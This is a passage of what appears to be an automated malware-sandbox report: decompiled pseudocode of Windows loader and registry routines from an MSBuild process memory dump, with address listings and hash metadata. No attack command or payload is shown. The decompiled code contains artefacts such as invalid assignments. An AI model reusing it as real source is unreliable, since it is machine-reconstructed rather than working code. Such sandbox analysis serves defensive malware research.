                                            								return E0104B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                            							}
                                            							_t181 = _v92;
                                            							L31:
                                            							_t226 = _t226 + 1;
                                            							_t181 =  &(_t181[0x18]);
                                            							_v88 = _t226;
                                            							_v92 = _t181;
                                            						} while (_t226 < 4);
                                            						goto L34;
                                            					}
                                            					L9:
                                            					_t172 = _v104;
                                            					_t222 = _v100;
                                            					goto L10;
                                            				}
                                            				_t247 = _t246 | 0xffffffff;
                                            				_t208 = _t247;
                                            				_v84 = _t247;
                                            				_v80 = _t208;
                                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                            					_t233 = _v72;
                                            					_v105 = _v64;
                                            					_t202 = _v76;
                                            				} else {
                                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                            					_v105 = 1;
                                            					if(_v63 <= _t204) {
                                            						_v63 = _t204;
                                            					}
                                            					_t202 = _v76 |  *(_t251 + 0x40);
                                            					_t233 = _v72 |  *(_t251 + 0x44);
                                            					_t247 =  *(_t251 + 0x38);
                                            					_t208 =  *(_t251 + 0x3c);
                                            					_v76 = _t202;
                                            					_v72 = _t233;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				_v104 = _t202;
                                            				_v100 = _t233;
                                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                                            					_t237 = _v48;
                                            					_v105 = 1;
                                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                            						_t237 = _v48;
                                            					}
                                            					_t203 = _t202 |  *(_t251 + 0xb8);
                                            					_t234 = _t233 |  *(_t251 + 0xbc);
                                            					_t247 = _t247 &  *(_t251 + 0xb0);
                                            					_t208 = _t208 &  *(_t251 + 0xb4);
                                            					_v104 = _t203;
                                            					_v76 = _t203;
                                            					_v100 = _t234;
                                            					_v72 = _t234;
                                            					_v84 = _t247;
                                            					_v80 = _t208;
                                            				}
                                            				if(_v105 == 0) {
                                            					_v36 = _v36 & 0x00000000;
                                            					_t208 = 0;
                                            					_t247 = 0;
                                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                            					goto L19;
                                            				} else {
                                            					_v36 = 1;
                                            					goto L8;
                                            				}
                                            			}































































                                            0x01035142
                                            0x0103514c
                                            0x01035150
                                            0x01035157
                                            0x01035159
                                            0x0103515e
                                            0x01035165
                                            0x01035169
                                            0x0103516c
                                            0x01035172
                                            0x01035176
                                            0x0103517a
                                            0x0103517a
                                            0x0103517a
                                            0x0103517f
                                            0x01076d8b
                                            0x01076d8e
                                            0x01076d91
                                            0x01076d95
                                            0x01076d98
                                            0x01076d9c
                                            0x01076da0
                                            0x01076da3
                                            0x01076da7
                                            0x01076e26
                                            0x01076e26
                                            0x01076e2a
                                            0x010351f9
                                            0x010351f9
                                            0x010351fe
                                            0x01076e33
                                            0x01076e33
                                            0x01076e39
                                            0x01076e3d
                                            0x01076e46
                                            0x01076e50
                                            0x00000000
                                            0x00000000
                                            0x01076e52
                                            0x01076e53
                                            0x01076e56
                                            0x01076e5d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01076e5f
                                            0x01076e67
                                            0x01076e77
                                            0x01076e7f
                                            0x01076e80
                                            0x01076e88
                                            0x01076e90
                                            0x01076e9f
                                            0x01076ea5
                                            0x01076ea9
                                            0x01076eb1
                                            0x01076ebf
                                            0x00000000
                                            0x00000000
                                            0x01076ecf
                                            0x01076ed3
                                            0x00000000
                                            0x00000000
                                            0x01076edb
                                            0x01076ede
                                            0x01076ee1
                                            0x01076ee8
                                            0x01076eeb
                                            0x01076eed
                                            0x01076ef0
                                            0x01076ef4
                                            0x01076ef8
                                            0x01076efc
                                            0x00000000
                                            0x00000000
                                            0x01076f0d
                                            0x01076f11
                                            0x01076f32
                                            0x01076f37
                                            0x01076f3b
                                            0x01076f3e
                                            0x01076f41
                                            0x01076f46
                                            0x00000000
                                            0x00000000
                                            0x01076f4c
                                            0x01076f50
                                            0x01076f50
                                            0x01076f54
                                            0x01076f62
                                            0x01076f65
                                            0x01076f6d
                                            0x01076f7b
                                            0x01076f7b
                                            0x01076f93
                                            0x01076f98
                                            0x01076fa0
                                            0x01076fa6
                                            0x01076fb3
                                            0x01076fb6
                                            0x01076fbf
                                            0x01076fc1
                                            0x01076fd5
                                            0x01076fda
                                            0x01076fda
                                            0x01076fdd
                                            0x01076fe2
                                            0x01076fe7
                                            0x01076feb
                                            0x01076fef
                                            0x01076ff3
                                            0x0103520c
                                            0x0103520c
                                            0x0103520f
                                            0x01035215
                                            0x01035234
                                            0x0103523a
                                            0x0103523a
                                            0x01035244
                                            0x01035245
                                            0x01035246
                                            0x01035251
                                            0x01035251
                                            0x01076f13
                                            0x01076f17
                                            0x01076f17
                                            0x01076f18
                                            0x01076f1b
                                            0x01076f1f
                                            0x01076f23
                                            0x00000000
                                            0x01076f28
                                            0x01035204
                                            0x01035204
                                            0x01035208
                                            0x00000000
                                            0x01035208
                                            0x01035185
                                            0x01035188
                                            0x0103518a
                                            0x0103518e
                                            0x01035195
                                            0x01076db1
                                            0x01076db5
                                            0x01076db9
                                            0x0103519b
                                            0x0103519b
                                            0x0103519e
                                            0x010351a7
                                            0x010351a9
                                            0x010351a9
                                            0x010351b5
                                            0x010351b8
                                            0x010351bb
                                            0x010351be
                                            0x010351c1
                                            0x010351c5
                                            0x010351c9
                                            0x010351cd
                                            0x010351cd
                                            0x010351d8
                                            0x010351dc
                                            0x010351e0
                                            0x01076dcc
                                            0x01076dd0
                                            0x01076dd5
                                            0x01076ddd
                                            0x01076de1
                                            0x01076de1
                                            0x01076de5
                                            0x01076deb
                                            0x01076df1
                                            0x01076df7
                                            0x01076dfd
                                            0x01076e01
                                            0x01076e05
                                            0x01076e09
                                            0x01076e0d
                                            0x01076e11
                                            0x01076e11
                                            0x010351eb
                                            0x01076e1a
                                            0x01076e1f
                                            0x01076e21
                                            0x01076e23
                                            0x00000000
                                            0x010351f1
                                            0x010351f1
                                            0x00000000
                                            0x010351f1

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c841c12b8bff28091158defad3c13ddadb81dcfe738a399838af032b0e00837
                                            • Instruction ID: 9cf405e026d9d253ec4df3eed458980712a05c8957a795a7644cf834472104ee
                                            • Opcode Fuzzy Hash: 7c841c12b8bff28091158defad3c13ddadb81dcfe738a399838af032b0e00837
                                            • Instruction Fuzzy Hash: 66C112759087818FE354CF28C480A5AFBE1BF89304F1449AEF9DA8B352D771E845CB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E010303E2(signed int __ecx, signed int __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				char _v52;
                                            				char _v56;
                                            				char _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t56;
                                            				signed int _t58;
                                            				char* _t64;
                                            				intOrPtr _t65;
                                            				signed int _t74;
                                            				signed int _t79;
                                            				char* _t83;
                                            				intOrPtr _t84;
                                            				signed int _t93;
                                            				signed int _t94;
                                            				signed char* _t95;
                                            				signed int _t99;
                                            				signed int _t100;
                                            				signed char* _t101;
                                            				signed int _t105;
                                            				signed int _t119;
                                            				signed int _t120;
                                            				void* _t122;
                                            				signed int _t123;
                                            				signed int _t127;
                                            
                                            				_v8 =  *0x10fd360 ^ _t127;
                                            				_t119 = __ecx;
                                            				_t105 = __edx;
                                            				_t118 = 0;
                                            				_v20 = __edx;
                                            				_t120 =  *(__ecx + 0x20);
                                            				if(E01030548(__ecx, 0) != 0) {
                                            					_t56 = 0xc000022d;
                                            					L23:
                                            					return E0104B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                            				} else {
                                            					_v12 = _v12 | 0xffffffff;
                                            					_t58 = _t120 + 0x24;
                                            					_t109 =  *(_t120 + 0x18);
                                            					_t118 = _t58;
                                            					_v16 = _t58;
                                            					E0101B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                            					_v52 = 0x18;
                                            					_v48 = 0;
                                            					0x840 = 0x40;
                                            					if( *0x10f7c1c != 0) {
                                            					}
                                            					_v40 = 0x840;
                                            					_v44 = _t105;
                                            					_v36 = 0;
                                            					_v32 = 0;
                                            					if(E01027D50() != 0) {
                                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					} else {
                                            						_t64 = 0x7ffe0384;
                                            					}
                                            					if( *_t64 != 0) {
                                            						_t65 =  *[fs:0x30];
                                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                            							_t100 = E01027D50();
                                            							__eflags = _t100;
                                            							if(_t100 == 0) {
                                            								_t101 = 0x7ffe0385;
                                            							} else {
                                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            							}
                                            							__eflags =  *_t101 & 0x00000020;
                                            							if(( *_t101 & 0x00000020) != 0) {
                                            								_t118 = _t118 | 0xffffffff;
                                            								_t109 = 0x1485;
                                            								E01087016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					_t105 = 0;
                                            					while(1) {
                                            						_push(0x60);
                                            						_push(5);
                                            						_push( &_v64);
                                            						_push( &_v52);
                                            						_push(0x100021);
                                            						_push( &_v12);
                                            						_t122 = E01049830();
                                            						if(_t122 >= 0) {
                                            							break;
                                            						}
                                            						__eflags = _t122 - 0xc0000034;
                                            						if(_t122 == 0xc0000034) {
                                            							L38:
                                            							_t120 = 0xc0000135;
                                            							break;
                                            						}
                                            						__eflags = _t122 - 0xc000003a;
                                            						if(_t122 == 0xc000003a) {
                                            							goto L38;
                                            						}
                                            						__eflags = _t122 - 0xc0000022;
                                            						if(_t122 != 0xc0000022) {
                                            							break;
                                            						}
                                            						__eflags = _t105;
                                            						if(__eflags != 0) {
                                            							break;
                                            						}
                                            						_t109 = _t119;
                                            						_t99 = E010869A6(_t119, __eflags);
                                            						__eflags = _t99;
                                            						if(_t99 == 0) {
                                            							break;
                                            						}
                                            						_t105 = _t105 + 1;
                                            					}
                                            					if( !_t120 >= 0) {
                                            						L22:
                                            						_t56 = _t120;
                                            						goto L23;
                                            					}
                                            					if( *0x10f7c04 != 0) {
                                            						_t118 = _v12;
                                            						_t120 = E0108A7AC(_t119, _t118, _t109);
                                            						__eflags = _t120;
                                            						if(_t120 >= 0) {
                                            							goto L10;
                                            						}
                                            						__eflags =  *0x10f7bd8;
                                            						if( *0x10f7bd8 != 0) {
                                            							L20:
                                            							if(_v12 != 0xffffffff) {
                                            								_push(_v12);
                                            								E010495D0();
                                            							}
                                            							goto L22;
                                            						}
                                            					}
                                            					L10:
                                            					_push(_v12);
                                            					_t105 = _t119 + 0xc;
                                            					_push(0x1000000);
                                            					_push(0x10);
                                            					_push(0);
                                            					_push(0);
                                            					_push(0xf);
                                            					_push(_t105);
                                            					_t120 = E010499A0();
                                            					if(_t120 < 0) {
                                            						__eflags = _t120 - 0xc000047e;
                                            						if(_t120 == 0xc000047e) {
                                            							L51:
                                            							_t74 = E01083540(_t120);
                                            							_t119 = _v16;
                                            							_t120 = _t74;
                                            							L52:
                                            							_t118 = 0x1485;
                                            							E0100B1E1(_t120, 0x1485, 0, _t119);
                                            							goto L20;
                                            						}
                                            						__eflags = _t120 - 0xc000047f;
                                            						if(_t120 == 0xc000047f) {
                                            							goto L51;
                                            						}
                                            						__eflags = _t120 - 0xc0000462;
                                            						if(_t120 == 0xc0000462) {
                                            							goto L51;
                                            						}
                                            						_t119 = _v16;
                                            						__eflags = _t120 - 0xc0000017;
                                            						if(_t120 != 0xc0000017) {
                                            							__eflags = _t120 - 0xc000009a;
                                            							if(_t120 != 0xc000009a) {
                                            								__eflags = _t120 - 0xc000012d;
                                            								if(_t120 != 0xc000012d) {
                                            									_v28 = _t119;
                                            									_push( &_v56);
                                            									_push(1);
                                            									_v24 = _t120;
                                            									_push( &_v28);
                                            									_push(1);
                                            									_push(2);
                                            									_push(0xc000007b);
                                            									_t79 = E0104AAF0();
                                            									__eflags = _t79;
                                            									if(_t79 >= 0) {
                                            										__eflags =  *0x10f8474 - 3;
                                            										if( *0x10f8474 != 3) {
                                            											 *0x10f79dc =  *0x10f79dc + 1;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L52;
                                            					}
                                            					if(E01027D50() != 0) {
                                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					} else {
                                            						_t83 = 0x7ffe0384;
                                            					}
                                            					if( *_t83 != 0) {
                                            						_t84 =  *[fs:0x30];
                                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                            							_t94 = E01027D50();
                                            							__eflags = _t94;
                                            							if(_t94 == 0) {
                                            								_t95 = 0x7ffe0385;
                                            							} else {
                                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                            							}
                                            							__eflags =  *_t95 & 0x00000020;
                                            							if(( *_t95 & 0x00000020) != 0) {
                                            								E01087016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                            						if( *0x10f8708 != 0) {
                                            							_t118 =  *0x7ffe0330;
                                            							_t123 =  *0x10f7b00; // 0x0
                                            							asm("ror esi, cl");
                                            							 *0x10fb1e0(_v12, _v20, 0x20);
                                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                            							asm("sbb esi, esi");
                                            							_t120 =  ~_t50 & _t93;
                                            						} else {
                                            							_t120 = 0;
                                            						}
                                            					}
                                            					if( !_t120 >= 0) {
                                            						L19:
                                            						_push( *_t105);
                                            						E010495D0();
                                            						 *_t105 =  *_t105 & 0x00000000;
                                            						goto L20;
                                            					}
                                            					_t120 = E01017F65(_t119);
                                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                            						__eflags = _t120;
                                            						if(_t120 < 0) {
                                            							goto L19;
                                            						}
                                            						 *(_t119 + 0x64) = _v12;
                                            						goto L22;
                                            					}
                                            					goto L19;
                                            				}
                                            			}








































                                            0x010303f1
                                            0x010303f7
                                            0x010303f9
                                            0x010303fb
                                            0x010303fd
                                            0x01030400
                                            0x0103040a
                                            0x01074c7a
                                            0x01030537
                                            0x01030547
                                            0x01030410
                                            0x01030410
                                            0x01030414
                                            0x01030417
                                            0x0103041a
                                            0x01030421
                                            0x01030424
                                            0x0103042b
                                            0x0103043b
                                            0x0103043e
                                            0x0103043f
                                            0x0103043f
                                            0x01030446
                                            0x01030449
                                            0x0103044c
                                            0x0103044f
                                            0x01030459
                                            0x01074c8d
                                            0x0103045f
                                            0x0103045f
                                            0x0103045f
                                            0x01030467
                                            0x01074c97
                                            0x01074c9d
                                            0x01074ca4
                                            0x01074caa
                                            0x01074caf
                                            0x01074cb1
                                            0x01074cc3
                                            0x01074cb3
                                            0x01074cbc
                                            0x01074cbc
                                            0x01074cc8
                                            0x01074ccb
                                            0x01074cd7
                                            0x01074cda
                                            0x01074cdf
                                            0x01074cdf
                                            0x01074ccb
                                            0x01074ca4
                                            0x0103046d
                                            0x0103046f
                                            0x0103046f
                                            0x01030471
                                            0x01030476
                                            0x0103047a
                                            0x0103047b
                                            0x01030483
                                            0x01030489
                                            0x0103048d
                                            0x00000000
                                            0x00000000
                                            0x01074ce9
                                            0x01074cef
                                            0x01074d22
                                            0x01074d22
                                            0x00000000
                                            0x01074d22
                                            0x01074cf1
                                            0x01074cf7
                                            0x00000000
                                            0x00000000
                                            0x01074cf9
                                            0x01074cff
                                            0x00000000
                                            0x00000000
                                            0x01074d05
                                            0x01074d07
                                            0x00000000
                                            0x00000000
                                            0x01074d0d
                                            0x01074d0f
                                            0x01074d14
                                            0x01074d16
                                            0x00000000
                                            0x00000000
                                            0x01074d1c
                                            0x01074d1c
                                            0x01030499
                                            0x01030535
                                            0x01030535
                                            0x00000000
                                            0x01030535
                                            0x010304a6
                                            0x01074d2c
                                            0x01074d37
                                            0x01074d39
                                            0x01074d3b
                                            0x00000000
                                            0x00000000
                                            0x01074d41
                                            0x01074d48
                                            0x01030527
                                            0x0103052b
                                            0x0103052d
                                            0x01030530
                                            0x01030530
                                            0x00000000
                                            0x0103052b
                                            0x01074d4e
                                            0x010304ac
                                            0x010304ac
                                            0x010304af
                                            0x010304b2
                                            0x010304b7
                                            0x010304b9
                                            0x010304bb
                                            0x010304bd
                                            0x010304bf
                                            0x010304c5
                                            0x010304c9
                                            0x01074d53
                                            0x01074d59
                                            0x01074db9
                                            0x01074dba
                                            0x01074dbf
                                            0x01074dc2
                                            0x01074dc4
                                            0x01074dc7
                                            0x01074dce
                                            0x00000000
                                            0x01074dce
                                            0x01074d5b
                                            0x01074d61
                                            0x00000000
                                            0x00000000
                                            0x01074d63
                                            0x01074d69
                                            0x00000000
                                            0x00000000
                                            0x01074d6b
                                            0x01074d6e
                                            0x01074d74
                                            0x01074d76
                                            0x01074d7c
                                            0x01074d7e
                                            0x01074d84
                                            0x01074d89
                                            0x01074d8c
                                            0x01074d8d
                                            0x01074d92
                                            0x01074d95
                                            0x01074d96
                                            0x01074d98
                                            0x01074d9a
                                            0x01074d9f
                                            0x01074da4
                                            0x01074da6
                                            0x01074da8
                                            0x01074daf
                                            0x01074db1
                                            0x01074db1
                                            0x01074daf
                                            0x01074da6
                                            0x01074d84
                                            0x01074d7c
                                            0x00000000
                                            0x01074d74
                                            0x010304d6
                                            0x01074de1
                                            0x010304dc
                                            0x010304dc
                                            0x010304dc
                                            0x010304e4
                                            0x01074deb
                                            0x01074df1
                                            0x01074df8
                                            0x01074dfe
                                            0x01074e03
                                            0x01074e05
                                            0x01074e17
                                            0x01074e07
                                            0x01074e10
                                            0x01074e10
                                            0x01074e1c
                                            0x01074e1f
                                            0x01074e35
                                            0x01074e35
                                            0x01074e1f
                                            0x01074df8
                                            0x010304f1
                                            0x010304fa
                                            0x01074e3f
                                            0x01074e47
                                            0x01074e5b
                                            0x01074e61
                                            0x01074e67
                                            0x01074e69
                                            0x01074e71
                                            0x01074e73
                                            0x01030500
                                            0x01030500
                                            0x01030500
                                            0x010304fa
                                            0x01030508
                                            0x0103051d
                                            0x0103051d
                                            0x0103051f
                                            0x01030524
                                            0x00000000
                                            0x01030524
                                            0x01030515
                                            0x01030517
                                            0x01074e7a
                                            0x01074e7c
                                            0x00000000
                                            0x00000000
                                            0x01074e85
                                            0x00000000
                                            0x01074e85
                                            0x00000000
                                            0x01030517

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1402607c69107f587b0411d792618448c0f089428e0721f77f49676184cb5df
                                            • Instruction ID: ab006fcd45db4df7503f77d9e1ca0d665bfa5a3a531b0233e6a51a1fc8ad6d40
                                            • Opcode Fuzzy Hash: e1402607c69107f587b0411d792618448c0f089428e0721f77f49676184cb5df
                                            • Instruction Fuzzy Hash: F3915D71E012199FEB32AB6CC844BAE7BE8EB41724F0502A5FAD0E72D5DB749D00C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0100C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                            				signed int _v8;
                                            				char _v1036;
                                            				signed int _v1040;
                                            				char _v1048;
                                            				signed int _v1052;
                                            				signed char _v1056;
                                            				void* _v1058;
                                            				char _v1060;
                                            				signed int _v1064;
                                            				void* _v1068;
                                            				intOrPtr _v1072;
                                            				void* _v1084;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t70;
                                            				intOrPtr _t72;
                                            				signed int _t74;
                                            				intOrPtr _t77;
                                            				signed int _t78;
                                            				signed int _t81;
                                            				void* _t101;
                                            				signed int _t102;
                                            				signed int _t107;
                                            				signed int _t109;
                                            				signed int _t110;
                                            				signed char _t111;
                                            				signed int _t112;
                                            				signed int _t113;
                                            				signed int _t114;
                                            				intOrPtr _t116;
                                            				void* _t117;
                                            				char _t118;
                                            				void* _t120;
                                            				char _t121;
                                            				signed int _t122;
                                            				signed int _t123;
                                            				signed int _t125;
                                            
                                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                            				_v8 =  *0x10fd360 ^ _t125;
                                            				_t116 = _a4;
                                            				_v1056 = _a16;
                                            				_v1040 = _a24;
                                            				if(E01016D30( &_v1048, _a8) < 0) {
                                            					L4:
                                            					_pop(_t117);
                                            					_pop(_t120);
                                            					_pop(_t101);
                                            					return E0104B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                            				}
                                            				_t70 = _a20;
                                            				if(_t70 >= 0x3f4) {
                                            					_t121 = _t70 + 0xc;
                                            					L19:
                                            					_t107 =  *( *[fs:0x30] + 0x18);
                                            					__eflags = _t107;
                                            					if(_t107 == 0) {
                                            						L60:
                                            						_t68 = 0xc0000017;
                                            						goto L4;
                                            					}
                                            					_t72 =  *0x10f7b9c; // 0x0
                                            					_t74 = L01024620(_t107, _t107, _t72 + 0x180000, _t121);
                                            					_v1064 = _t74;
                                            					__eflags = _t74;
                                            					if(_t74 == 0) {
                                            						goto L60;
                                            					}
                                            					_t102 = _t74;
                                            					_push( &_v1060);
                                            					_push(_t121);
                                            					_push(_t74);
                                            					_push(2);
                                            					_push( &_v1048);
                                            					_push(_t116);
                                            					_t122 = E01049650();
                                            					__eflags = _t122;
                                            					if(_t122 >= 0) {
                                            						L7:
                                            						_t114 = _a12;
                                            						__eflags = _t114;
                                            						if(_t114 != 0) {
                                            							_t77 = _a20;
                                            							L26:
                                            							_t109 =  *(_t102 + 4);
                                            							__eflags = _t109 - 3;
                                            							if(_t109 == 3) {
                                            								L55:
                                            								__eflags = _t114 - _t109;
                                            								if(_t114 != _t109) {
                                            									L59:
                                            									_t122 = 0xc0000024;
                                            									L15:
                                            									_t78 = _v1052;
                                            									__eflags = _t78;
                                            									if(_t78 != 0) {
                                            										L010277F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                            									}
                                            									_t68 = _t122;
                                            									goto L4;
                                            								}
                                            								_t110 = _v1056;
                                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                                            								_v1060 = _t118;
                                            								__eflags = _t110;
                                            								if(_t110 == 0) {
                                            									L10:
                                            									_t122 = 0x80000005;
                                            									L11:
                                            									_t81 = _v1040;
                                            									__eflags = _t81;
                                            									if(_t81 == 0) {
                                            										goto L15;
                                            									}
                                            									__eflags = _t122;
                                            									if(_t122 >= 0) {
                                            										L14:
                                            										 *_t81 = _t118;
                                            										goto L15;
                                            									}
                                            									__eflags = _t122 - 0x80000005;
                                            									if(_t122 != 0x80000005) {
                                            										goto L15;
                                            									}
                                            									goto L14;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                            									goto L10;
                                            								}
                                            								_push( *((intOrPtr*)(_t102 + 8)));
                                            								_t59 = _t102 + 0xc; // 0xc
                                            								_push(_t110);
                                            								L54:
                                            								E0104F3E0();
                                            								_t125 = _t125 + 0xc;
                                            								goto L11;
                                            							}
                                            							__eflags = _t109 - 7;
                                            							if(_t109 == 7) {
                                            								goto L55;
                                            							}
                                            							_t118 = 4;
                                            							__eflags = _t109 - _t118;
                                            							if(_t109 != _t118) {
                                            								__eflags = _t109 - 0xb;
                                            								if(_t109 != 0xb) {
                                            									__eflags = _t109 - 1;
                                            									if(_t109 == 1) {
                                            										__eflags = _t114 - _t118;
                                            										if(_t114 != _t118) {
                                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                                            											_v1060 = _t118;
                                            											__eflags = _t118 - _t77;
                                            											if(_t118 > _t77) {
                                            												goto L10;
                                            											}
                                            											_push(_t118);
                                            											_t56 = _t102 + 0xc; // 0xc
                                            											_push(_v1056);
                                            											goto L54;
                                            										}
                                            										__eflags = _t77 - _t118;
                                            										if(_t77 != _t118) {
                                            											L34:
                                            											_t122 = 0xc0000004;
                                            											goto L15;
                                            										}
                                            										_t111 = _v1056;
                                            										__eflags = _t111 & 0x00000003;
                                            										if((_t111 & 0x00000003) == 0) {
                                            											_v1060 = _t118;
                                            											__eflags = _t111;
                                            											if(__eflags == 0) {
                                            												goto L10;
                                            											}
                                            											_t42 = _t102 + 0xc; // 0xc
                                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                            											_push(_t111);
                                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                            											_push(0);
                                            											_push( &_v1048);
                                            											_t122 = E010413C0(_t102, _t118, _t122, __eflags);
                                            											L44:
                                            											_t118 = _v1072;
                                            											goto L11;
                                            										}
                                            										_t122 = 0x80000002;
                                            										goto L15;
                                            									}
                                            									_t122 = 0xc0000024;
                                            									goto L44;
                                            								}
                                            								__eflags = _t114 - _t109;
                                            								if(_t114 != _t109) {
                                            									goto L59;
                                            								}
                                            								_t118 = 8;
                                            								__eflags = _t77 - _t118;
                                            								if(_t77 != _t118) {
                                            									goto L34;
                                            								}
                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                            									goto L34;
                                            								}
                                            								_t112 = _v1056;
                                            								_v1060 = _t118;
                                            								__eflags = _t112;
                                            								if(_t112 == 0) {
                                            									goto L10;
                                            								}
                                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                            								goto L11;
                                            							}
                                            							__eflags = _t114 - _t118;
                                            							if(_t114 != _t118) {
                                            								goto L59;
                                            							}
                                            							__eflags = _t77 - _t118;
                                            							if(_t77 != _t118) {
                                            								goto L34;
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                            								goto L34;
                                            							}
                                            							_t113 = _v1056;
                                            							_v1060 = _t118;
                                            							__eflags = _t113;
                                            							if(_t113 == 0) {
                                            								goto L10;
                                            							}
                                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                            							goto L11;
                                            						}
                                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                                            						__eflags = _t118 - _a20;
                                            						if(_t118 <= _a20) {
                                            							_t114 =  *(_t102 + 4);
                                            							_t77 = _t118;
                                            							goto L26;
                                            						}
                                            						_v1060 = _t118;
                                            						goto L10;
                                            					}
                                            					__eflags = _t122 - 0x80000005;
                                            					if(_t122 != 0x80000005) {
                                            						goto L15;
                                            					}
                                            					L010277F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                            					L18:
                                            					_t121 = _v1060;
                                            					goto L19;
                                            				}
                                            				_push( &_v1060);
                                            				_push(0x400);
                                            				_t102 =  &_v1036;
                                            				_push(_t102);
                                            				_push(2);
                                            				_push( &_v1048);
                                            				_push(_t116);
                                            				_t122 = E01049650();
                                            				if(_t122 >= 0) {
                                            					__eflags = 0;
                                            					_v1052 = 0;
                                            					goto L7;
                                            				}
                                            				if(_t122 == 0x80000005) {
                                            					goto L18;
                                            				}
                                            				goto L4;
                                            			}










































                                            0x0100c608
                                            0x0100c615
                                            0x0100c625
                                            0x0100c62d
                                            0x0100c635
                                            0x0100c640
                                            0x0100c680
                                            0x0100c687
                                            0x0100c688
                                            0x0100c689
                                            0x0100c694
                                            0x0100c694
                                            0x0100c642
                                            0x0100c64a
                                            0x0100c697
                                            0x01077a25
                                            0x01077a2b
                                            0x01077a2e
                                            0x01077a30
                                            0x01077bea
                                            0x01077bea
                                            0x00000000
                                            0x01077bea
                                            0x01077a36
                                            0x01077a43
                                            0x01077a48
                                            0x01077a4c
                                            0x01077a4e
                                            0x00000000
                                            0x00000000
                                            0x01077a58
                                            0x01077a5a
                                            0x01077a5b
                                            0x01077a5c
                                            0x01077a5d
                                            0x01077a63
                                            0x01077a64
                                            0x01077a6a
                                            0x01077a6c
                                            0x01077a6e
                                            0x010779cb
                                            0x010779cb
                                            0x010779ce
                                            0x010779d0
                                            0x01077a98
                                            0x01077a9b
                                            0x01077a9b
                                            0x01077a9e
                                            0x01077aa1
                                            0x01077bbe
                                            0x01077bbe
                                            0x01077bc0
                                            0x01077be0
                                            0x01077be0
                                            0x01077a01
                                            0x01077a01
                                            0x01077a05
                                            0x01077a07
                                            0x01077a15
                                            0x01077a15
                                            0x01077a1a
                                            0x00000000
                                            0x01077a1a
                                            0x01077bc2
                                            0x01077bc6
                                            0x01077bc9
                                            0x01077bcd
                                            0x01077bcf
                                            0x010779e6
                                            0x010779e6
